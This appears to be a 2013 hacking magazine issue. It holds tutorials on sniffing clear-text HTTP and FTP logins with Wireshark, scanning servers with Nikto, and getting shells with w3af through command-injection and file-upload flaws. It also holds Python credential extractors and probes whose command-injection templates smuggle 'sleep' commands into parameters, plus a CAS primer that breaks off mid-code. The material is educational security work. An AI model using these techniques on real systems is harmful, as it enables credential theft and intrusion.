Different Ways of hacking passwords

Hack In Sight Magazine, issue 01/2012, published 24th of January 2013


Dear Readers,

After a long time of preparation we can proudly present to you the first Hack Insight issue. We decided to start it with Hacking Passwords because it is the base and first step for every IT security expert who is developing his hacking skills.

Two articles have been prepared by Mr. Vikas Kumar, who is an experienced ethical hacker. He describes in detail how to use Wireshark, Nikto and W3af. His research will help us to understand how to sniff network traffic and use the best-known network protocol analyzer, Wireshark.

The second article concerns hacking methods. Mr. Kumar presents how a keylogger works and how to create your own phishing page. You should definitely check this section out and think of the dangers during daily computer usage.

The third article, written by Mr. Miroslav Ludvik and Mr. Radek Pilar, refers to Content Addressed Storage. In this issue we will see an introduction to secure data archiving. In the second issue, as Miroslav promised, he will present content about the first vendor technology; you definitely cannot miss this article.

This first publication wouldn't be possible without our magazine's friends who spent a lot of their working time taking care of this issue. Special thanks to Ms. Sheryl Checkman, Mr. Timothy Coleman and Mr. Ty Donaldson. We are grateful that, thanks to your professional advice, attention to grammatical correctness and creation of the creative cover and essential images, we can now read this magazine.

Enjoy the hacking!

Hack Insight Team

Editorial Section:

Authors: Vikas Kumar, Miroslav Ludvik, Radek Pilar.

Proof-reading: Timothy Coleman, Nina Takahashi, Agata Brzozowska.

DTP: Sheryl Checkman, Ty Donaldson.

Publisher: Hack Insight Press Paweł Płocki, www.hackinsight.org

Editor in Chief: Paweł Płocki, [email protected]

All trade marks presented in the magazine were used only for informative purposes.


Table of Contents

• Page 6: Advanced Usage of Wireshark, Nikto and W3af. Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

• Page 24: CAS - introduction. Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS (Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then, there will be a few articles about existing solutions and finally, their comparison.

• Page 27: Data Stealing. Data Theft Prevention. Phishing. Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner's authorization. In other words, if a company's server has been accessed by a hacker it is a case of data theft. Even reading the mails of your colleague would be taken as a crime in the eyes of the law. It is irrelevant whether you later used this data for misdeeds or not; what counts is that data that is not yours has been accessed without the prior permission of its authorized user, who may also be its creator.


Advanced Usage of Wireshark, Nikto and W3af.

I. Wireshark:

Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Figure 1. Wireshark logo

Wireshark, formerly known as Ethereal, is one of the most powerful tools in a network security analyst's toolkit. As a network packet analyzer, Wireshark can peer inside the network and examine the details of traffic at a variety of levels, ranging from connection-level information to the bits comprising a single packet. This flexibility and depth of inspection make it a valuable tool for analyzing security events and troubleshooting network security device issues.


The Role of a Network Protocol Analyzer

Network protocol analyzers like Wireshark let us look at the behavior of network protocols. This can be useful for three main reasons:

1. Observing the network traffic generated by protocols, services, applications etc, helps us gain a better understanding of how these various things work.

2. The ability to observe exactly what is happening over a network can also often help us gain a better understanding of a problem we are troubleshooting.

3. Finally the ability to monitor network traffic can help us identify threats to or breaches of network security.

How to sniff network traffic, and why sniff the network?

The phrase "sniff the network" may conjure Orwellian visions of a Big Brother network administrator reading people's private email messages. Before anyone uses Wireshark, an organization should ensure that it has a clearly defined privacy policy that spells out the rights of individuals using its network, grants permission to sniff traffic for security and troubleshooting issues, and states the organization's policy requirements for obtaining, analyzing and retaining network traffic dumps. Anyone who uses a tool like Wireshark without first obtaining the necessary permissions may quickly find themselves in hot water legally.

However, as a security professional, there are two important reasons to sniff network traffic. First, peering into the details of packets can prove invaluable when dissecting a network attack and designing countermeasures. For example, if a denial of service occurs, Wireshark can be used to identify the specific type of attack; the analyst can then craft upstream firewall rules that block the unwanted traffic. The second major use of Wireshark is to troubleshoot security devices. Specifically, I regularly use it to troubleshoot firewall rules. If systems running Wireshark are connected to either side of a firewall, it's easy to see which packets successfully traverse the device and identify whether the firewall is the cause of connectivity problems.

That being said, it's important to remember that Wireshark can be used for good or for evil, as is the case with many security analyzers. In the hands of a network or security administrator it's a valuable troubleshooting tool. In the hands of someone with questionable ethics, however, it's a powerful eavesdropping tool that enables someone to view every packet that traverses the network.

Downloading & Installing Wireshark

If you don't already have Wireshark installed on your computer, you can download it from the Wireshark website at http://www.wireshark.org.

Security note: it is best practice to download software only from the official site of the developer. There are many other sites which offer Wireshark downloads; my advice is to avoid them, as you can't know whether the software you are downloading has been altered in a malicious way by the third-party site. Checking the download against the checksums and signatures that the project publishes for each release closes that gap.

The installation is straightforward; for most people you should be able to run the installer and simply click Next through the whole process.

Running a simple packet capture

Once Wireshark is installed, start it up and you will be presented with the screen shown below, in which you select the interface on which you want to capture packets:

Figure 2. Available interfaces

Figure 3. Interface selection for capturing data packets


Click the Start button next to the name of the interface on which you wish to capture traffic, and immediately you will see Wireshark filling up with traffic as shown on picture below.

Figure 4. Wireshark traffic

Interpreting the results

Each line in the top pane of the Wireshark window corresponds to a single packet seen on the network. The default display shows the time of the packet (relative to the start of the capture), the source and destination IP addresses, the protocol used and some information about the packet. You can drill down and obtain more information by clicking on a row. This causes the bottom two panes to fill with information.

The middle pane contains drill-down details on the packet selected in the top pane. The "+" icons reveal varying levels of detail about each layer of information contained within the packet. In the example above, I've selected a DNS response packet. I've expanded the DNS response (application layer) section of the packet to show that the original query was requesting a DNS resolution for www.cnn.com, and this response is informing us that the available IP addresses include 64.236.91.21. The bottom pane shows the contents of the packet in both hexadecimal and ASCII representations.

Wireshark color codes

Color is your friend when analyzing packets with Wireshark. Notice in the example above that each row is color-coded. The darker blue rows correspond to DNS traffic, the lighter blue rows are UDP SNMP traffic, and the green rows signify HTTP traffic. Wireshark includes a complex color-coding scheme (which you can customize). The default settings appear below:

Figure 5. Wireshark color coding


Wireshark is now capturing packets, so let's test it: ping any other system in the network and Wireshark will capture the ICMP packets.

Figure 6. Pinging from IP 192.168.152.130 to target system IP 192.168.152.128

Figure 7. ICMP packet filtering showing echo request and reply

Capturing HTTP login credentials

With Wireshark still capturing, log in to a web site that uses a plain HTTP login form; in this example I logged in to www.jammuclubjammu.com.

Figure 8. Entering credentials in the login form


Next, filter the packets. For this tutorial I have used the http filter, as shown below. Note that there are many protocols you can filter on (e.g. ftp).

Figure 9. Finding HTTP packets with a display filter

Now look for the POST request, select it, right-click (or go to the Analyze menu) and select Follow TCP Stream.

Figure 10. Following the TCP stream of the POST request

You should now see this window; just scroll down until you see the username and password. As you can see, I managed to capture my username and password. Because the form was submitted over plain HTTP, the credentials travel in clear text and anyone on the path can read them; only an encrypted transport (HTTPS) prevents this.

Figure 11. The TCP stream window shows the credentials

FTP packet capturing with login credentials


Now we are going to capture FTP packets. For that we use the Windows command prompt to log in to the FTP account of the jammuclubjammu.com web server.

Figure 12. FTP login from the command prompt

We have entered the credentials and, side by side, Wireshark is capturing all the packets.

Figure 13. Logging in to the FTP account with credentials


Now we will decode the FTP packets. First, filter on ftp as shown below:

Figure 14. FTP packet filtering

Then right-click on an FTP packet and click Follow TCP Stream. FTP sends the USER and PASS commands in clear text, so the credentials appear directly in the stream.

Figure 15. FTP stream decoded, credentials in plain text


Filtering Packets

If you're trying to inspect something specific, such as the traffic a program sends when phoning home, it helps to close down all other applications using the network so you can narrow down the traffic. Still, you'll likely have a large number of packets to sift through. That's where Wireshark's filters come in.

The most basic way to apply a filter is by typing it into the filter box at the top of the window and clicking Apply (or pressing Enter). For example, type "ip.src == 192.168.152.130" and you'll see only packets with source IP 192.168.152.130. When you start typing, Wireshark will help you autocomplete your filter.

Figure 16. Packet filtering with ip.src == 192.168.152.130

Next, filter on "dns":

Figure 17. Packet filtering with dns
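The two captures above (the HTTP POST body and the FTP USER/PASS commands) and the ip.src display filter can be reproduced without Wireshark. The following Python is an added example written for this page, not code from the article or from the Wireshark project: it parses a classic pcap file with the standard library only, pulls clear-text credentials out of HTTP POST bodies and FTP commands, and takes an optional filter callable that plays the role of a Wireshark display filter. The capture it reads is constructed in memory using the two hosts from Figure 6; the credentials, ports and hostname in it are invented for the example.

```python
"""Minimal pcap parser that pulls clear-text credentials out of HTTP POST and FTP
packets (what "Follow TCP Stream" showed above), with a callable that plays the
role of a Wireshark display filter such as ip.src == 192.168.152.130.
Standard library only; the sample capture is constructed in memory."""
import socket
import struct
from urllib.parse import parse_qs

PCAP_MAGIC = 0xA1B2C3D4          # little-endian pcap, microsecond timestamps
LINKTYPE_ETHERNET = 1


def build_tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Ethernet + IPv4 + TCP frame carrying `payload`. Checksums are left zero
    because the parser below never validates them (Wireshark would flag them)."""
    eth = b"\x00" * 12 + b"\x08\x00"                       # MACs zeroed, EtherType IPv4
    ip_len = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_len, 1, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Wrap frames in a pcap file: 24-byte global header, 16-byte record headers."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1358985600 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_frames(pcap_bytes):
    """Yield the raw link-layer frames of a little-endian Ethernet pcap."""
    magic, = struct.unpack_from("<I", pcap_bytes, 0)
    linktype, = struct.unpack_from("<I", pcap_bytes, 20)
    if magic != PCAP_MAGIC or linktype != LINKTYPE_ETHERNET:
        raise ValueError("not a little-endian Ethernet pcap")
    off = 24
    while off + 16 <= len(pcap_bytes):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from("<IIII", pcap_bytes, off)
        off += 16
        yield pcap_bytes[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return the fields a display filter can use, or None if not IPv4/TCP."""
    if frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                          # IP protocol 6 = TCP
        return None
    total_len, = struct.unpack_from("!H", ip, 2)
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    data_off = (tcp[12] >> 4) * 4
    return {"ip.src": socket.inet_ntoa(ip[12:16]), "ip.dst": socket.inet_ntoa(ip[16:20]),
            "tcp.srcport": sport, "tcp.dstport": dport, "payload": tcp[data_off:]}


def extract_credentials(pcap_bytes, display_filter=None):
    """Credentials visible in clear text, as (protocol, src, dst, field, value)."""
    hits = []
    for frame in iter_frames(pcap_bytes):
        pkt = parse_tcp(frame)
        if pkt is None or (display_filter and not display_filter(pkt)):
            continue
        data = pkt["payload"]
        if pkt["tcp.dstport"] == 80 and data.startswith(b"POST "):
            _head, _sep, body = data.partition(b"\r\n\r\n")   # form fields follow the headers
            for name, values in parse_qs(body.decode("latin-1")).items():
                if any(k in name.lower() for k in ("user", "pass", "login")):
                    hits.append(("HTTP", pkt["ip.src"], pkt["ip.dst"], name, values[0]))
        elif pkt["tcp.dstport"] == 21 and data[:5] in (b"USER ", b"PASS "):
            verb, _sep, arg = data.decode("latin-1").strip().partition(" ")
            hits.append(("FTP", pkt["ip.src"], pkt["ip.dst"], verb, arg))
    return hits


# Constructed sample capture: the two hosts from Figure 6, invented credentials.
CLIENT, SERVER = "192.168.152.130", "192.168.152.128"
HTTP_POST = (b"POST /login.php HTTP/1.1\r\nHost: www.example.com\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 30\r\n\r\n"
             b"username=alice&password=s3cret")
SAMPLE_PCAP = build_pcap([
    build_tcp_frame(CLIENT, SERVER, 49152, 80, HTTP_POST),
    build_tcp_frame(SERVER, CLIENT, 80, 49152, b"HTTP/1.1 302 Found\r\n\r\n"),
    build_tcp_frame(CLIENT, SERVER, 49153, 21, b"USER alice\r\n"),
    build_tcp_frame(CLIENT, SERVER, 49153, 21, b"PASS s3cret\r\n"),
])

if __name__ == "__main__":
    # Equivalent of the display filter ip.src == 192.168.152.130
    for hit in extract_credentials(SAMPLE_PCAP, lambda p: p["ip.src"] == CLIENT):
        print(hit)
```

To read a real capture, pass open("capture.pcap", "rb").read() instead of SAMPLE_PCAP; note that pcapng, the format newer Wireshark versions save by default, is a different container and is not handled here.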


Inspecting Packets

Click a packet to select it and you can dig down to view its details.

Figure 18. Inspecting a packet

You can also create filters from here: just right-click one of the details and use the Apply as Filter submenu to create a filter based on it.

Figure 19. Apply as Filter

Wireshark is an extremely powerful tool, and this tutorial is just scratching the surface of what you can do with it. Professionals use it to debug network protocol implementations, examine security problems and inspect network protocol internals.


II. Nikto:

Introduction

Nikto is an open source web server scanner "which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers." The good thing about Nikto is that it is easy to use and scans quickly. Nikto is written in Perl by Chris Sullo and David Lodge. Not every check is a big security problem, but most are, such as XSS (Cross Site Scripting) vulnerabilities, exposed phpMyAdmin logins, etc. Nikto alerts you and gives security tips in order to protect your website from various attacks.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS).

Not every check is a security problem, though most are. There are some "info only" checks that look for things that may not be a security flaw, but that the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

If you are using BackTrack to practice pen-testing then you needn't worry about installing Nikto, as it is already there (even in BackTrack 4). If you aren't using BackTrack, you can download Nikto from http://www.cirt.net/nikto2. Make sure you have Perl installed, because Nikto is a Perl script. You can run Nikto in two ways:

1. Go to Applications > Backtrack > Vulnerability Assessment > Web Application Assessment > Web Vulnerabilities Scanner > Nikto

2. From a terminal, change into the Nikto directory and run the script; -H prints the full help:

root@bt:~# cd /pentest/web/nikto
root@bt:/pentest/web/nikto# ./nikto.pl -H

Figure 20. Nikto help options (first part)

Figure 21. Nikto help options (second part)


If we give the command ./nikto.pl -Help or perl nikto.pl -Help we get the details of all options. We are simply going to scan a target website, because we are pentesting it. For example, to scan a host and save the report to a text file:

root@bt:/pentest/web/nikto# ./nikto.pl -host 10.x.x.52 -output kioptrix_80.txt

Figure 22. Nikto scanning the target website

Figure 23. Nikto scanning result


Now you will get an output file in txt format which you can open for reading, for example with cat:

root@bt:/pentest/web/nikto# cat kioptrix_80.txt

Figure 24. Nikto output file

In order to run a simple vulnerability scan against a target you just have to specify a host address along with a port number. For example:

perl nikto.pl -h 10.10.15.27 -p 32333

Figure 25. Nikto scanning a web server on a given port


In the above command:

"-h" specifies the host address.

"-p" specifies the port number.

The above command runs a vulnerability scan against the host 10.10.15.27. Since we specified the port number as 32333, Nikto scans that particular port only. If you want the scan to include multiple ports, specify a port range:

perl nikto.pl -h 10.10.15.27 -p 1024-10000

What if you don't specify any port?

perl nikto.pl -h 10.10.15.27

Figure 25. Nikto scanning a web server without specifying a port

In this case Nikto just scans port 80. Are "-h" and "-p" the only switches that Nikto offers? No, it offers a wide variety of switches. Just type perl nikto.pl without arguments to see the options Nikto offers.

Figure 26. Nikto scanning options

III. W3af:

Security is a key point for every effective business. Whether you run your own website or it is your job to manage the web applications of your company, you have to do some penetration testing to check the security of the web application. Nowadays exploits are available and updated on a daily basis for different web application services. While doing a penetration test, a pentester must consider these exploits for different vulnerabilities. Finding vulnerabilities is not enough; a pentester must also check the exploits that are publicly available for the services found.

w3af (Web Application Attack and Audit Framework) is a framework for auditing and exploiting web applications. In this series of articles we will be looking at almost all the features that w3af has to offer and discuss how to use them for web application penetration testing. In the first part of this series we will be working with the w3af console and getting ourselves familiar with the commands. We will also be looking at the different types of plugins that w3af has to offer and discuss how to use them for optimal performance.

I have heard some say that w3af is the Metasploit for web applications. w3af is basically a free, open source web application scanner. It has many plugins that are divided into attack, audit, exploit, discovery, evasion, brute force, mangle and a few other categories. The code is well commented and written in Python, so writing your own exploits and plugins should be straightforward.

Some of the major features of w3af are:

1. It has plugins that communicate with each other. For example, the discovery plugins in w3af look for different URLs to test for vulnerabilities and pass them on to the audit plugins, which then use these URLs to search for vulnerabilities.

2. It removes some of the headaches involved in manual web application testing through its fuzzy and manual request generator feature. It can also be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be performed using variable parameters.

3. It also has features to exploit the vulnerabilities that it finds.

Figure 27. W3af (Web Application Attack and Audit Framework)

The first step is to give the URL to w3af and scan it for XSS vulnerabilities. Open up the w3af GUI. Once it is open, on the left-hand side, we can see an option to choose from various profiles.

Figure 28. W3af profile selection.

We can choose any profile from the list depending on our need, as well as the time available. These profiles already have configurations to use specific plugins for a particular task. For example, if we look at the profile OWASP_TOP10, we will see that it uses several of the Audit, Grep and Discovery plugins to perform its tasks.

Figure 29. W3af Plug-ins selection for scanning target url

For the time being, we are going to use an empty profile, as we just want to check a single URL for an XSS vulnerability. Note that this is usually not the way in which we will use the w3af framework. In a real-world environment, we will choose some specific discovery plugins to find different URLs to check for injections, auth plugins to automatically log in to forms and crawl ahead, grep plugins to look for interesting information in the responses, and audit plugins to scan for vulnerabilities in the found injection points.

Type the URL in the target field and choose the xss plugin from the audit plugins.

Figure 30. URL scanning

Once this is done, click on Start. This will start the scan on the given URL. As we can see from the output, it found an XSS vulnerability.


Figure 31. w3af scanning result

If you are interested in knowing what actually happened, go to the Results tab. Click on xss on the left side. On the right side, you can see a description of how the vulnerability was found.

On the bottom right, you can also see the request and response which led to the identification of the vulnerability. It is a very good practice to look at the requests and responses sent by w3af, as this lets us know what's going on under the hood.

Figure 32. w3af vulnerability description

So basically what happened was that w3af sent JavaScript strings to every parameter in the URL, and then checked for those strings in the response. In the case of stored XSS, w3af takes a note of the injected string and requests the URL again looking for that string. If it finds that string, then a stored XSS has been identified.

Let's now use an OS commanding vulnerability to obtain a shell on the system. From the OS commanding section in the w3af test environment, choose a URL and give it as the target to w3af. Under the audit plugins section, check the OS commanding plugin.

Figure 33. w3af OS commanding plugin for obtaining a shell on the target URL


Figure 34. OS commanding vulnerability output

Once this is done, click on Start to launch the vulnerability scan. As we can see from the output, w3af identified an OS commanding vulnerability.

w3af supports detection of both simple and blind OS commanding vulnerabilities. In simple OS commanding, it sends a simple command to every parameter and then looks for the output of that command in the response. In blind OS commanding the command output is not present in the response, so it uses time delays to identify whether a vulnerability is present: if it sends a command which delays the response for some seconds and we observe that delay, we can say that a blind OS commanding vulnerability is present. Again, in the Results section, we can see the request and the response which led to identification of the vulnerability.

Figure 35. Vulnerability identification
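The XSS detection described after Figure 32 and the blind OS commanding detection described here follow one pattern: inject into each parameter, then look at the response (or its timing). The Python below is an added illustration of that logic written for this page; it is not taken from w3af. It assumes a hypothetical fetch(url) callable that returns (body, elapsed_seconds); in a real scan that would wrap an HTTP client and time.monotonic(). fake_app is a constructed vulnerable target so the example runs offline; the parameter names q, name and host and the host target.test are invented.

```python
"""Reflected-XSS probe (inject a unique marker into each URL parameter and look for
it unescaped in the response) and a time-based blind OS commanding probe, in the
spirit of the two w3af checks described above. Added illustration, not w3af's code.
`fetch(url)` is a hypothetical callable returning (body, elapsed_seconds)."""
import html
import re
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def _params(url):
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def inject(url, param, value):
    """Return `url` with `param` replaced by `value`, other parameters untouched."""
    parts = urlsplit(url)
    query = [(k, value if k == param else v) for k, v in _params(url)]
    return urlunsplit(parts._replace(query=urlencode(query)))


def probe_reflected_xss(url, fetch):
    """(param, payload) for every parameter whose injected tag comes back verbatim."""
    findings = []
    for param, _ in _params(url):
        payload = "<%s>" % secrets.token_hex(4)        # random so cached pages can't fool us
        body, _ = fetch(inject(url, param, payload))
        if payload in body:                           # HTML-escaped reflections do not match
            findings.append((param, payload))
    return findings


# Separators that make a shell execute a second command after the original one.
OS_CMD_TEMPLATES = ("; sleep %d", "| sleep %d", "`sleep %d`")


def probe_blind_os_commanding(url, fetch, delay=5, tolerance=0.5):
    """(param, template) where a sleep injection delays the response by about `delay`
    seconds and a second, shorter sleep confirms it (guards against a merely slow server)."""
    findings = []
    _, baseline = fetch(url)
    for param, _ in _params(url):
        for template in OS_CMD_TEMPLATES:
            _, t1 = fetch(inject(url, param, template % delay))
            if t1 < baseline + delay - tolerance:
                continue
            _, t2 = fetch(inject(url, param, template % (delay // 2)))
            if t2 >= baseline + delay // 2 - tolerance and t2 < t1:
                findings.append((param, template))
                break
    return findings


def fake_app(url):
    """Constructed target: 'q' is reflected unescaped, 'name' is HTML-escaped and
    'host' is interpolated into a shell command (simulated: a sleep reached through
    a shell separator delays the response). Returns (body, elapsed_seconds)."""
    p = dict(_params(url))
    body = "<p>Results for %s</p><p>Hello %s</p>" % (p.get("q", ""), html.escape(p.get("name", "")))
    delay = 0.0
    m = re.search(r"[;|`]\s*sleep\s+(\d+)", p.get("host", ""))
    if m:
        delay = float(m.group(1))
    return body, 0.1 + delay


if __name__ == "__main__":
    print(probe_reflected_xss("http://target.test/search?q=test&name=bob", fake_app))
    print(probe_blind_os_commanding("http://target.test/ping?host=127.0.0.1", fake_app))
```

A sleep injection that works is real command execution on the target, so this probe belongs only in an authorized test; the confirmation step with a shorter delay is what keeps a slow or loaded server from being reported as vulnerable.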

w3af also allows us to exploit vulnerabilities. If we go to the Exploit section, we can see the identified vulnerability in the Vulnerabilities list. If we click on it, osCommandingShell in the Exploits list turns black. This indicates that the vulnerability can be exploited using the osCommandingShell plugin in w3af. Right-click on osCommandingShell and click on Exploit ALL vulns.


Figure 36. w3af vulnerability exploitation

Once this is done, if the vulnerability is exploited successfully, we will get a shell on the target machine. We can see the list of shells on the right side. Note that it is not possible to get a shell for every vulnerability.

Just double-click on the shell and you are all set and ready to go.

Figure 37. Shell execution

Similarly, let's use a file upload vulnerability to get a shell. Give the vulnerable URL as a target to w3af. Make sure the fileUpload plugin is checked in the audit plugins list.

Figure 38. fileUpload in the plugins list

Also make sure to check the extensions option in the fileUpload plugin. Since in some cases the web application allows only some specific extensions, it is useful to add those extensions to the list as well.


Figure 39. Specifying extensions for the web application

Click on Start. As we can see from the output, w3af identified a file upload vulnerability.

Figure 40. fileUpload vulnerability identification

Click on the Results tab. You can see that w3af tried to upload a file named w3af_dt4LqT.html. It did this by sending the file object in the uploadedfile parameter. It then looked for the file in common directories like uploads etc. If the file is found, then it can be said that an insecure file upload vulnerability exists. However, this is not always the case, as most web applications filter files based on their extension. To bypass this, w3af has templates for some of the most common file extensions. These templates have valid extensions but contain a section that can be replaced with scripting code. The figure below shows the template files with different extensions present in w3af.

Figure 41. fileUpload templates

If we open any of these files with Kate, we can see the content inside it. As we can see from the figure below, the file template.png has a string of A's in its comment section. This string can be replaced by scripting code such as PHP.

Figure 42. String replacement

With all of these basics out of the way, let's exploit this vulnerability using the fileUploadShell plugin. You can also set the configuration of these plugins by right-clicking on them and clicking on Configure the plugin.

As we can see from the figure below, the vulnerability was successfully exploited and we got a shell on the target machine.


Figure 43. Vulnerability exploitation

Similarly you can perform tests for many other vulnerability classes, such as Local File Inclusion, Remote File Inclusion, SQL Injection etc.

About the author

VIKAS KUMAR (ISHAN) is one of the leading computer security experts in India. He was born on 26 July 1990 in the town of Meerut, UP (India). He started his group "hackers4u" on Facebook in 2010 and within two years made his mark on the World Wide Web with ethical hacking articles; he is going to launch a website on Cyber Security & Ethical Hacking and works with the anti-hacking community "I-hackers4u". The 22-year-old has the capability to compete with the best in the business of so-called "Ethical Hacking". Workshops and Seminars: VIKAS KUMAR has trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United Kingdom, Thailand, Nigeria, Sri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Oman, Yemen, Indonesia, Korea, Iran etc.

www.cyber-hunt.com
Blog: www.cyber-hunt2012.blogspot.com
LinkedIn Profile: https://www.linkedin.com/profile/view?id=71569482&trk=tab_pro
Facebook: https://www.facebook.com/hackers4u
BackTrack Fan Club Page: https://www.facebook.com/pages/Cyber-Hunt-BackTrack-Fan- Club/395372283859684?ref=tn_tnmn
Facebook Page: https://www.facebook.com/vikas7852?ref=tn_tnmn
Email ID: [email protected] [email protected]


CAS – introduction

Abstract:

Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS (Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then, there will be a few articles about existing solutions and finally, their comparison.

Typical filesystems use name and path to uniquely identify a stored object (which can be a file, directory, symlink, etc.). This approach has a few advantages, but also a few disadvantages that CAS systems aim to fix. CAS, as its name implies, identifies the object by its content. Of course, it wouldn't be practically feasible to use the whole content of the object as its identifier; in that case, storing the file would be pointless. Instead, CAS systems use a cryptographic hash of the content. So, if we want to access the file with content "Balance for the year 2012", instead of the file:

/home/accountant/docs/balance2012.doc

or on Windows:

C:\Users\Accountant\Documents\balance2012.doc

we access the object identified by the string:

cd52089ea948bd42fece0ebba0c91b5ae68169e4

which is, in this example, the SHA-1 hash of its content. Because with that approach you'd lose some information (filename, author, creation date), the CAS system attaches metadata to objects.

The first CAS system was introduced in 2003 by the US company EMC under the name Centera, but was immediately followed by similar products from other vendors like HP, Hitachi, Oracle/Sun, Dell and others. Today, CAS is used as a de facto standard for long-term data archiving. CAS-based solutions have several advantages. Since the system works with content hashes instead of filenames, it is much more difficult to tamper with data (even from the sysadmin's perspective): it is really easy to save a different file under the same name, but really difficult to save a different file with the same hash, and an object whose stored bytes have been altered no longer hashes to its own identifier, so the alteration can be detected on read. On the other side, two files with the same contents will have the same hash; therefore, only one copy will be stored in the system. This effectively supersedes file-level deduplication: the non-existence of multiple copies of the same file is implied by the basic principles of the system itself.

However, CAS systems have their disadvantages as well. If the user wants to modify an already stored object, it involves copying its contents, modification, reading the whole file, hash calculation and a final write. Even if we change just a single byte of a multi-megabyte file, we still need to re-read the whole file and compute a new hash. Considering current hardware prices, though, this disadvantage is minor and mostly theoretical.

The second disadvantage is the existence of hash collisions. Since a hash function maps input of arbitrary length to output of fixed length, loss of information occurs; therefore, there exist multiple different inputs with the same hash, and it depends only on the specific implementation of the CAS system how it handles a collision. The odds that a collision will occur can be estimated from the length of the hash function output. For example, the MD5 hashing algorithm always returns a 128-bit value. Therefore, the chance that two randomly chosen objects will have the same hash is 1:2^128, and 2^128 is also the theoretical upper limit on the number of distinct objects a CAS system can store. (By the birthday bound, an accidental collision among stored objects only becomes likely after roughly 2^64 objects, so the practical concern is deliberate collisions, not random ones.) If someone wants to create his own file, different from ours, with the same hash (a preimage attack), he'll need approximately 2^123 computations. The worst situation happens when someone wants to create two arbitrary files with the same hash: in that case, only about 2^21 operations are necessary. Fortunately, there exist more secure algorithms like SHA-1, which has an output size of 160 bits, with no known preimage attack faster than brute force (2^160) and with the fastest collision-discovery attack having complexity 2^61. At the time of writing, the danger of using this hashing algorithm is almost non-existent with current technology and knowledge. (A practical SHA-1 collision was demonstrated publicly in 2017 at a cost of roughly 2^63 SHA-1 computations, so a new CAS deployment should prefer SHA-256 or stronger.)

And in case you've thought about distributed version control systems when reading this article, you were right. Most distributed VCSs use some kind of CAS as their backend. I'll use some low-level git commands to demonstrate the basic principles of CAS:

Listing 1. Creating empty git repository.

# Create empty git repository
$ git init
Initialized empty Git repository in /tmp/example/.git/

# Objects are stored in .git/objects
$ ls .git/objects/
info pack

# Create example file
$ cat > foo.txt << EOF
Lorem ipsum dolor sit amet.
EOF

# Store example file to database; git prints the object's SHA-1
$ git hash-object -w foo.txt
d2cf010d36ff3f5a199c335135f37ca40822b35b

# We try to manually calculate the SHA-1 hash of the file (note: git prefixes
# the contents with "blob <content_len>\0"; the 28 bytes include the trailing
# newline, which echo appends for us)
$ echo -e "blob 28\0Lorem ipsum dolor sit amet."|sha1sum
d2cf010d36ff3f5a199c335135f37ca40822b35b -

# We see hashes are equal. Let's look at .git/objects
$ ls .git/objects/*
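The git session in Listing 1 (continued in Listing 2) and the collision estimates above, redone in Python as an added example that is not part of the article: a tiny content-addressed store that hashes objects exactly as git does (the "blob <len>\0" header reproduced by hand in Listing 1), so deduplication and the cost of a one-byte modification can be observed directly, together with the birthday bound behind the 1:2^128 figure. The class and function names are this example's own.

```python
"""Minimal content-addressed store in the style of git's blob objects.

Added example, not from the article: it reproduces what Listings 1 and 2 do
by hand and quantifies the collision odds discussed above. The class and
function names are this example's own.
"""
import hashlib
import math
from typing import Dict


def git_blob_id(content: bytes) -> str:
    """SHA-1 that git assigns to `content` stored as a blob.

    git hashes the header "blob <length>\\0" followed by the raw bytes, which
    is why Listing 1 can reproduce `git hash-object` with echo and sha1sum.
    """
    header = b"blob %d\0" % len(content)
    return hashlib.sha1(header + content).hexdigest()


class ContentStore:
    """Objects are addressed by the hash of their content, never by a name."""

    def __init__(self) -> None:
        self._objects: Dict[str, bytes] = {}

    def put(self, content: bytes) -> str:
        """Store content and return its address; identical content is stored once."""
        key = git_blob_id(content)
        self._objects.setdefault(key, content)
        return key

    def get(self, key: str) -> bytes:
        return self._objects[key]

    def modify(self, key: str, offset: int, new_byte: bytes) -> str:
        """Change one byte of a stored object and return the new address.

        Even a one-byte edit means reading the whole object, re-hashing all of
        it and writing a new object; the original stays addressable as before.
        """
        old = self.get(key)
        updated = old[:offset] + new_byte + old[offset + 1:]
        return self.put(updated)

    def __len__(self) -> int:
        return len(self._objects)


def collision_probability(hash_bits: int, n_objects: int) -> float:
    """Birthday bound: probability that at least two of n random objects share
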